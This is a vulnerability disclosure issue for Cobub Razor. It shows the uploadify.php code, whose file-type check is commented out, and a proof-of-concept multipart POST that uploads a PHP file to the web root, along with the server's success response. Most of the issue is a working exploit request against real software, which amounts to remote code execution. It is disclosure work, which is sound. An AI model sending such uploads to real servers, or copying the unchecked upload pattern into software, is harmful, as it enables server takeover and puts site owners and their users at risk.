Vulnerability: Cobub Razor file upload
kyrie403 opened this issue · comments
kyrie403 commented
Vulnerability: Cobub Razor file upload
Detail:
/web/assets/swf/uploadify.php Line 26:
Determine whether $_FILES is empty->Get the document root directory+folder+name->upload file. File type is not restricted.
if (!empty($_FILES)) {
$tempFile = $_FILES['Filedata']['tmp_name'];
$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
$targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];
// $fileTypes = str_replace('*.','',$_REQUEST['fileext']);
// $fileTypes = str_replace(';','|',$fileTypes);
// $typesArray = split('\|',$fileTypes);
// $fileParts = pathinfo($_FILES['Filedata']['name']);
// if (in_array($fileParts['extension'],$typesArray)) {
// Uncomment the following line if you want to make the directory if it doesn't exist
// mkdir(str_replace('//','/',$targetPath), 0755, true);
move_uploaded_file($tempFile,$targetFile);
echo $targetFile;
POC:
Construct an upload POST:
POST /razor/web/assets/swf/uploadify.php?folder=/razor/web/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 213
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------18467633426500
Content-Disposition: form-data; name="Filedata"; filename="phpinfo.php"
Content-Type: image/jpeg
<?php phpinfo();?>
-----------------------------18467633426500
Upload success:
HTTP/1.1 200 OK
Date: Fri, 29 Mar 2019 04:33:23 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9
X-Powered-By: PHP/5.6.27
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57
D:/***/***/WWW/razor/web/phpinfo.php